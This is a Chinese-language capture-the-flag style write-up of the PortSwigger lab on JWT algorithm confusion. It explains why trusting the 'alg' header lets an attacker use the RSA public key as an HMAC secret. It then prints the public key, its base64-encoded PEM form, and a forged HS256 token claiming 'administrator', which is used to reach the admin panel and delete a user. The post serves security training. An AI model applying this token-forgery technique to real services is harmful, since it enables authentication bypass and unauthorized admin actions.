JWT 算法混淆攻击
一、前言
JWT 算法混淆漏洞成因
该漏洞本质是服务端验证逻辑的两个失误:
- 信任
alg字段:服务端未强制固定验签算法,而是听从 JWT Header 中的alg声明。 - 密钥上下文混淆:当算法被改为 HS256(对称加密)时,服务端错误地复用 RSA 公钥 作为 HMAC 的 密钥。
正常情况下,公钥仅用于验签 RS256 签名。但在 HS256 模式下,公钥变成了“对称密钥”。因为公钥是公开的,攻击者即可用它伪造签名,通过服务端验证。
二、靶场测试
靶场地址(需注册账号):https://portswigger.net/web-security/jwt/algorithm-confusion/lab-jwt-authentication-bypass-via-algorithm-confusion
1. 进入靶场
进入靶场,点击My account进入登录页面,输入账号密码登录:
wiener
peter
进入admin界面,显示只有administrator用户才能使用:
2. 获取公钥
访问jwks.json获取服务器的RSA公钥
{"kty":"RSA","e":"AQAB","use":"sig","kid":"4c7c90f0-f586-4caf-916f-cb261365751e","alg":"RS256","n":"tmF7ZxEtKCB042bKRwSfCEs1brWUpfDnVyIORK-APdxTa8IUdVef3duwnmzbOjVdPM5jKmEYWfG8GEiqebrZ2Vd__1rXa0nluSUe-FWkEN2Z7oLn8RYOa6Qa2CRpCxwvJ4aVN3ogDbCHXDsZnnneIVk47dj8JFu9xta8xFo7S1UYaTMmvTCeAMPj67X5FyVyyAR2vl4UN3ISM9-8NxyL-BL5O0x-Pa70j17_KZkQEJMG_CZpUn-JNx9SmTwCKzAxX_vs_aW3ytiJBSOYK1M0RWdiskz9LbZnHNxRaggbhVKQnN2kkIMdI5xUDqSr-XCjS901PddwoEkaZWOCA9aISw"}
使用在线网站一键转换为PEM格式公钥(也可以自己编写Python脚本或者使用Burp的JWT Editor)
地址:https://atools.live/zh-cn/tools/pem-jwk-toolkit
-----BEGIN PUBLIC KEY-----
MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAtmF7ZxEtKCB042bKRwSf
CEs1brWUpfDnVyIORK+APdxTa8IUdVef3duwnmzbOjVdPM5jKmEYWfG8GEiqebrZ
2Vd//1rXa0nluSUe+FWkEN2Z7oLn8RYOa6Qa2CRpCxwvJ4aVN3ogDbCHXDsZnnne
IVk47dj8JFu9xta8xFo7S1UYaTMmvTCeAMPj67X5FyVyyAR2vl4UN3ISM9+8NxyL
+BL5O0x+Pa70j17/KZkQEJMG/CZpUn+JNx9SmTwCKzAxX/vs/aW3ytiJBSOYK1M0
RWdiskz9LbZnHNxRaggbhVKQnN2kkIMdI5xUDqSr+XCjS901PddwoEkaZWOCA9aI
SwIDAQAB
-----END PUBLIC KEY-----在jwt.io用该公钥对自己的JWT验签,可以看到验签成功
3. 构造JWT
由于在jwt.io直接粘贴公钥构造签名会出错,经过检查发现是0d0a换行的问题,所以这里用CyberChef转换一下,替换0d0a为0a,然后编码成URL safe的Base64:
LS0tLS1CRUdJTiBQVUJMSUMgS0VZLS0tLS0KTUlJQklqQU5CZ2txaGtpRzl3MEJBUUVGQUFPQ0FROEFNSUlCQ2dLQ0FRRUF0bUY3WnhFdEtDQjA0MmJLUndTZgpDRXMxYnJXVXBmRG5WeUlPUksrQVBkeFRhOElVZFZlZjNkdXdubXpiT2pWZFBNNWpLbUVZV2ZHOEdFaXFlYnJaCjJWZC8vMXJYYTBubHVTVWUrRldrRU4yWjdvTG44UllPYTZRYTJDUnBDeHd2SjRhVk4zb2dEYkNIWERzWm5ubmUKSVZrNDdkajhKRnU5eHRhOHhGbzdTMVVZYVRNbXZUQ2VBTVBqNjdYNUZ5Vnl5QVIydmw0VU4zSVNNOSs4Tnh5TAorQkw1TzB4K1BhNzBqMTcvS1prUUVKTUcvQ1pwVW4rSk54OVNtVHdDS3pBeFgvdnMvYVczeXRpSkJTT1lLMU0wClJXZGlza3o5TGJabkhOeFJhZ2diaFZLUW5OMmtrSU1kSTV4VURxU3IrWENqUzkwMVBkZHdvRWthWldPQ0E5YUkKU3dJREFRQUIKLS0tLS1FTkQgUFVCTElDIEtFWS0tLS0tCg
进入Encoder界面,Header的RS256(带有SHA-256的 RSA 签名)改为HS256(带有 SHA-256 的HMAC),Payload的sub改为administrator,Secret填入刚才的Base64编码后的PEM公钥
eyJraWQiOiI0YzdjOTBmMC1mNTg2LTRjYWYtOTE2Zi1jYjI2MTM2NTc1MWUiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJwb3J0c3dpZ2dlciIsImV4cCI6MTc3MzUwNTAzNiwic3ViIjoiYWRtaW5pc3RyYXRvciJ9.s2UHOkkOGGiazE4JgW8E2SoLLNkGbBcbCrBRSHHIrG4
4.验证
访问my-account接口,Cookie换成构造的JWT,显示当前用户为administrator
可以访问admin接口了
这里抓包替换查看更直观一点:
点击Delete,抓包替换一下JWT,删除用户成功,通关成功
本文作者CVE-柠檬i
CSDN:https://blog.csdn.net/weixin_49125123
博客园:https://www.cnblogs.com/CVE-Lemon
先知社区:https://xz.aliyun.com/users/136909
微信公众号:Lemon安全